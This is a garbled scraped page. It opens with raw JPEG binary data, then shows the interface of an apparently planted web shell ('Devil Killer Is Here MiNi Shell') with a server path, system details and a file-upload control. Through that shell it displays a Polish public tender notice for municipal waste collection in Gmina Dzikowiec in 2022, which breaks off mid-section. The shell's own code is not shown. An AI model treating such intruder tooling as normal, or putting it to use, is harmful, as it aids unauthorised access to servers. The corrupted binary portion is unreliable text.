JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211110/0026583401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu gminy Dzikowiec oraz PSZOK położonych w miejscowości Nowy Dzikowiec oraz Wilcza Wola w roku 2022 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA DZIKOWIEC</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690581695</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Dworska 62</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dzikowiec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-122</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">17 744 21 09</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">17 22 74 508</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ugdzikowiec@dzikowiec.itl.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminadzikowiec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu gminy Dzikowiec oraz PSZOK położonych w miejscowości Nowy Dzikowiec oraz Wilcza Wola w roku 2022 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3b4ff4a2-422d-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00265834</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001217/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu gminy Dzikowiec oraz PSZOK położonych w miejscowości Nowy Dzikowiec oraz Wilcza Wola w roku 2022</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://gminadzikowiec.pl/16-bip.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gminadzikowiec.logintrade.net/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">5.	Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi <br/>w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej <br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>6.	Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.<br/>7.	Środkiem komunikacji elektronicznej, służącym złożeniu oferty przez Wykonawcę, jest jego prawidłowe złożenie na Platformie dostępnej pod adresem https://gminadzikowiec.logintrade.net/ w wierszu oznaczonym tytułem oraz znakiem sprawy zgodnym z niniejszym postępowaniem. Korzystanie z Platformy Przetargowej przez Wykonawcę jest bezpłatne.<br/>8.	Komunikacja miedzy Zamawiającym, a wykonawcą odbywa się przy użyciu Platformy Przetargowej: https://gminadzikowiec.logintrade.net/<br/>9.	Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na Platformie Przetargowej https://gminadzikowiec.logintrade.net/ ma dostęp do możliwości złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających na zadanie pytań do treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach.<br/>10.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania <br/>z Platformy. <br/>11.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB. <br/>12.	Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu Platformy Przetargowej:<br/>REKOMENDOWANE przeglądarki internetowe:<br/>•	Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11;<br/>•	Google Chrome 31;<br/>•	Mozilla Firefox 26;<br/>•	Opera 18.<br/>Pozostałe wymagania techniczne:<br/>•	dostęp do sieci Internet;<br/>•	zainstalowana wtyczka flash - flash player - dotyczy kupca;<br/>•	obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax;<br/>•	włączona obsługa JavaScript;<br/>•	zalecana szybkość łącza internetowego powyżej 500 KB/s;<br/>•	zainstalowany Acrobat Reader;<br/>•	zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy.<br/>W przypadku aukcji z podpisem elektronicznym dopuszczalne są przeglądarki internetowe:<br/>•	dla Windows Vista: Internet Explorer 8, Internet Explorer 9;<br/>•	dla Windows 7: Internet Explorer 9, Internet Explorer 11;<br/>•	dla Windows 8: Internet Explorer 11;<br/>•	dla Windows 10: Internet Explorer 11;<br/>REKOMENDOWANE formaty przesyłanych danych<br/>image/bmp, image/x-windows-bmp, application/msword, application/drafting, image/gif, application/x-compressed, application/x-gzip, multipart/x-gzip, image/jpeg, image/pjpeg, application/x-latex, application/pdf, image/pict, image/png, application/mspowerpoint, application/postscript, application/rtf, application/x-rtf, text/richtext, image/tiff, image/x-tiff, application/mswrite, application/excel, application/x-excel, application/vnd.ms-excel, application/x-msexcel, application/vnd.ms-excel, text/xml, application/x-zip-compressed, application/zip, application/vnd.ms-office, image/x-ms-bmp, video/x-msvideo, audio/x-ms-wma, application/vnd.oasis.opendocument.spreadsheet, application/acad, application/x-acad, application/autocad_dwg, image/x-dwg, application/dwg, application/x-dwg, application/x-autocad, image/vnd.dwg, drawing/dwg</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zamawiający zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego <br/>i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych <br/>w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1)	Administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Gminy <br/>w Dzikowcu jest: Wójt Gminy; ul. Dworska 62, 36-122 Dzikowiec. <br/>2)	Inspektorem ochrony danych osobowych w Gminie Dzikowiec jest Pani: <br/>Izabela Pałka: inspektor.odo@gminadzikowiec.pl.<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego „Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu gminy Dzikowiec oraz PSZOK położonych w miejscowości Nowy Dzikowiec oraz Wilcza Wola w roku 2022” numer referencyjny nadany sprawie: ZP.271.11.2021 prowadzonym w trybie: podstawowym.<br/>4)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 Ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (t.j. Dz. U. z 2019 r. poz. 1843)., dalej „ustawa Pzp”; <br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.11.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Przedmiotem zamówienia jest odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu gminy Dzikowiec oraz Punktów Selektywnej Zbiórki Odpadów Komunalnych położonych <br/>w miejscowości Nowy Dzikowiec oraz Wilcza Wola w roku 2022. <br/>2)	Wynagrodzenie przyszłego Wykonawcy jest wynagrodzeniem w wysokości równej iloczynowi ilości odebranych i zagospodarowanych odpadów komunalnych bez względu na ich rodzaj i zaoferowanej ceny jednostkowej za 1 Mg odebranych <br/>i zagospodarowanych odpadów komunalnych plus należny podatek VAT.<br/>3)	Zakres rzeczowy przedmiotu zamówienia:<br/>A.	Ogólna charakterystyka Gminy Dzikowiec w kontekście odbioru i zagospodarowania odpadów.<br/><br/>Liczba mieszkańców zamieszkałych na terenie Gminy Dzikowiec wynosi:<br/>ok. 4050 osób (w związku z migracją ludności liczba ta może ulec zmianie)<br/>1) Na terenie Gminy Dzikowiec znajduje się około 1360 nieruchomości .<br/>2) Obszar Gminy wynosi 12 158 ha, w skład Gminy Dzikowiec wchodzi 8 miejscowości: Dzikowiec, Nowy Dzikowiec, Lipnica, Kopcie, Wilcza Wola, Mechowiec, Osia Góra, Płazówka.<br/>4) Zamawiający wyposażył nieruchomości zamieszkałe w pojemniki 120 L na odpady niesegregowane (zmieszane).<br/><br/>Ilość odpadów odebranych z terenu Gminy Dzikowiec w roku 2020<br/><br/>Lp.	KOD I RODZAJ ODPADU	2020 (Mg)<br/>1	15 01 02 Opakowania z tworzyw sztucznych	0,800<br/>2	20 01 36 Zużyte urządzenia elektryczne I elektroniczne inne niż wymienione w 20 01 21, 20 01 23 I 20 01 35	2,845<br/>3	20 02 03 Inne odpady nieulegające biodegradacji	15,500<br/>4	20 01 01 Papier I tektura	4,300<br/>5	20 01 02 Szkło	56,170<br/>6	20 01 35* Zużyte urządzenia elektryczne I elektroniczne inne niż wymienione w 20 01 21 I 20 01 23 zawierające niebezpieczne składniki	2,940<br/>7	16 01 03 Zużyte opony	59,980<br/>8	20 01 23* Urządzenia zawierające freony	2,240<br/>9	15 01 01 Opakowania z papieru i tektury	0,550<br/>10	15 01 06 Zmieszane odpady opakowaniowe	64,440<br/>11	20 03 07 Odpady wielkogabarytowe	40,720<br/>12	15 01 07 Opakowania ze szkła	24,130<br/>13	20 01 39 Tworzywa sztuczne	8,600<br/>14	20 03 01 Niesegregowane (zmieszane ) odpady komunalne	442,140<br/>	RAZEM	725,3550<br/> <br/>W ramach niniejszego zamówienia w okresie od 01.01.2022r. do 31.12.2022r. Wykonawca zobowiązany jest do odbioru i zagospodarowania odpadów komunalnych (szacunkowa ilość odpadów):<br/>Lp.	KOD I RODZAJ ODPADU (Mg)	<br/>1.	Niesegregowanych odpady komunalne 20 03 01	Mg	420,00<br/>2.	Opakowania z papieru i tektury (kod 15 01 0, 20 01 01)	Mg 3,00<br/>3.	Opakowania z tworzyw sztucznych (kod 15 01 02), opakowania z metali, metale(kod 15 01 04, 20 01 40), opakowania wielomateriałowe (15 01 05)	Mg 119,00<br/>4.	Opakowania ze szkła (kod 15 01 07,20 01 02)	Mg	93,00<br/>5.	Odpady ulegające biodegradacji (odpadów zielonych kod 20 02 01, 20 01 08). 3,00<br/>6.	Odpady wielkogabarytowe (kod 200307).	Mg	45,00<br/>7.	Zużyte opony 160103	Mg	50,00<br/>8.	Odpady budowlane i rozbiórkowe (kod 17 01 01, 17 01 02, 17 01 03, 17 06 04, 17 09 04).	Mg	20,00<br/>9.	Odpady komunalne – zużyty sprzęt elektryczny i elektroniczny kod odpadu 20 01 36, 20 01 35, 20 01 23, 20 01 21	Mg	8,00<br/>10.	Odpady komunalne – zużyte baterie i akumulatory, kod odpadu 20 01 33,20 01 34	Mg	1,00<br/>11.	Odpady komunalne – opakowania po chemikaliach kod odpadu 20 01 27*,20 01 13, 20 01 28, 20 01 29*, 20 01 19*, 15 01 10*)	Mg	2,00<br/>12.	Odpady komunalne – przeterminowane leki oraz chemikalia kod odpadu 20 01 32	Mg	0,10<br/>13.	Odpady komunalne – odpady tekstyliów i odzieży kod odpadu 20 01 10, 20 01 11	Mg	2,00<br/>14.	Odpady komunalne – żużel, popiół <br/>kod odpadu 20 01 99	Mg	1,00<br/>Łączna szacunkowa ilość odpadów<br/> 767,10<br/><br/>B.	Szczegółowy opis przedmiotu zamówienia<br/>1)	Wykonawca zobowiązany jest do odbioru i zagospodarowania całej ilości odpadów komunalnych wystawionych i przekazanych przez właścicieli nieruchomości zamieszkałych, w tym:<br/>•	zmieszanych odpadów komunalnych i pozostałości z segregacji odpadów<br/>•	papieru i tektury,<br/>•	szkła,<br/>•	tworzyw sztucznych, metali, odpadów wielomateriałowych,<br/>•	odpadów ulegających biodegradacji. <br/>2)	Wykonawca zobowiązany jest do nieodpłatnego wyposażenia nieruchomości <br/>z których odbierane są odpady komunalne:<br/>•	w kolorowe worki o pojemności 80-120 l w ilości po 4 szt. z każdego rodzaju<br/> do gromadzenia odpadów w sposób selektywny z folii LDPE o grubości zapewniającej wytrzymałość worków przeznaczonych na gromadzenie odpadów selektywnych lub zgodnie z rzeczywistymi potrzebami mieszkańców:<br/>3)	Wykonawca udostępnia worki do gromadzenia odpadów w sposób selektywny, które będą przekazywane mieszkańcom gminy przy każdym odbiorze w takiej samej ilości <br/>i rodzaju jakie zostały odebrane. Worki winny być oznaczone odpowiednią informacją o rodzaju gromadzonych w nich odpadów, nazwą, adresem oraz numerem telefonu Wykonawcy i Zamawiającego.<br/>4)	Wykonawca zobowiązany będzie najpóźniej do 24 grudnia 2021 r. do wyposażenia nieruchomości zamieszkałych w posiadane przez Zamawiającego pojemniki.<br/>5) Wykonawca zobowiązany będzie najpóźniej do 24 grudnia 2021 r. do wyposażenia nieruchomości zamieszkałych w worki oraz wyposażenia Punktów Selektywnej Zbiórki Odpadów Komunalnych (PSZOK) położonego w miejscowości Wilcza Wola na działce nr ewid. 1546/1 oraz w miejscowości Nowy Dzikowiec, 36-122 Dzikowiec ul. Komunalna 4 na działce nr ewid. 232/2, 233/2 w odpowiednie kontenery w ilości 11 szt. dla każdego PSZOKu tj. 2 szt.- KP-10, 3 szt. – KP-7, 2 szt. – 1100 l, 2 szt.- 240 l, 2 szt. -120 l. <br/><br/>Obsługę i funkcjonowanie PSZOK zapewnia Zamawiający.<br/><br/>C.	Częstotliwość odbioru odpadów zmieszanych i selektywnych<br/><br/>Wykonawca jest zobowiązany do odbierania odpadów komunalnych zmieszanych <br/>i segregowanych z terenu gminy Dzikowiec z nieruchomości zamieszkałych <br/>z częstotliwością:<br/>1) z obszarów zabudowy zagrodowej i jednorodzinnej nie rzadziej niż:<br/>a)	zmieszane odpady komunalne – jeden raz w miesiącu ,<br/>b)	zebrane selektywnie szkło, tworzywa sztuczne, metale, opakowania wielomateriałowe - jeden raz w miesiącu , <br/>c)	zebrane selektywnie opakowania z papieru i tektury – raz na kwartał, <br/>d)	odpady ulegające biodegradacji ze szczególnym uwzględnieniem bioodpadów, w tym odpadów zielonych:<br/>- należy poddawać kompostowaniu na terenie nieruchomości w przydomowych kompostownikach (nie może to powodować uciążliwości dla użytkowników nieruchomości sąsiednich),<br/>- w przypadku braku możliwości kompostowania należy je gromadzić w workach i wystawiać przed posesje w wyznaczonym terminie określonym w harmonogramie nie rzadziej niż raz na kwartał lub dostarczyć samodzielnie do Punktu Selektywnej Zbiórki Odpadów Komunalnych zlokalizowanych na terenie gminy;<br/>e)	zużyty sprzęt elektryczny i elektroniczny – dwa razy w roku bezpośrednio spod posesji, lub dostarczyć do Punktu Selektywnej Zbiórki Odpadów Komunalnych zlokalizowanych na terenie gminy;<br/>f)	odpady wielkogabarytowe, meble, - dwa razy w roku bezpośrednio spod posesji, lub dostarczyć do Punktu Selektywnej Zbiórki Odpadów Komunalnych zlokalizowanych na terenie gminy;<br/>g)	zużyte opony - dwa razy w roku bezpośrednio spod posesji, lub dostarczyć do Punktu Selektywnej Zbiórki Odpadów Komunalnych zlokalizowanych na terenie gminy;<br/>2)	Wykonawca jest zobowiązany odebrać od właścicieli nieruchomości zamieszkałych, każdą ilość niesegregowanych (zmieszanych) oraz segregowanych odpadów komunalnych wystawionych przed posesję . <br/>3)	Odbiór odpadów z PSZOK następował będzie na zgłoszenie Zamawiającego<br/> w godzinach otwarcia. <br/>4) Wykonawca zobowiązany będzie w ramach umowy do przygotowania harmonogramu odpadów oraz do jego dystrybucji wśród właścicieli nieruchomości do dnia 24 grudnia 2021 r. <br/>5) Wykonawca będzie zobowiązany również do dystrybucji wśród właścicieli nieruchomości innych dokumentów związanych z Systemem Gospodarki Odpadami Komunalnymi.<br/>6)	Wykonawca zobowiązany jest do odbierania odpadów komunalnych od właścicieli nieruchomości zamieszkałych zgodnie z ustalonym przez Wykonawcę harmonogramem i zatwierdzonym przez Zamawiającego.<br/>7)	Wykonawca jest obowiązany do realizacji &#34;reklamacji&#34; (nieodebranie z nieruchomości odpadów zgodnie z harmonogramem, niedostarczenie worków na odpady segregowane itp.) w czasie nie dłuższym niż 24 godz. od otrzymania zawiadomienia e-mailem od Zamawiającego. Wykonanie reklamacji należy niezwłocznie potwierdzić e-mailem na adres Zamawiającego. <br/>8)	Wykonawca jest zobowiązany do porządkowania terenu zanieczyszczonego odpadami<br/>komunalnymi i innymi zanieczyszczeniami wysypanymi z pojemników, kontenerów, worków, pojazdów w trakcie realizacji usługi wywozu.<br/>9)	Wykonawca zobowiązany jest do odbioru i zagospodarowania odpadów zebranych <br/>w PSZOK systematycznie, nie rzadziej niż raz na kwartał aby nie dopuścić do ich przepełnienia i wysypywania . Obsługę i funkcjonowanie zapewnia zamawiający.<br/>10)	Urządzenia do gromadzenia odpadów komunalnych zostaną ustawione przez wykonawcę w miejscach uzgodnionych z właścicielami nieruchomości. Jeśli podczas odbierania odpadów komunalnych dojdzie do uszkodzenia lub zniszczenia z winy Wykonawcy pojemników, wykonawca w trakcie realizacji zamówienia zobowiązany będzie do odkupienia pojemników na swój koszt.<br/><br/>CPV (Wspólny Słownik Zamówień): <br/>CPV 90500000-2 - usługi związane z odpadami<br/>CPV 90512000-9 - usługi transportu odpadów<br/>CPV 90513100-7 - usługi wywozu odpadów pochodzących z gospodarstw domowych<br/>CPV 90514000-3 - usługi recyklingu odpadów<br/>CPV 90533000-2 - usługi gospodarki odpadami </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90513100-7 - Usługi wywozu odpadów pochodzących z gospodarstw domowych</p> <p class="mb-0">90514000-3 - Usługi recyklingu odpadów</p> <p class="mb-0">90533000-2 - Usługi gospodarki odpadami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru 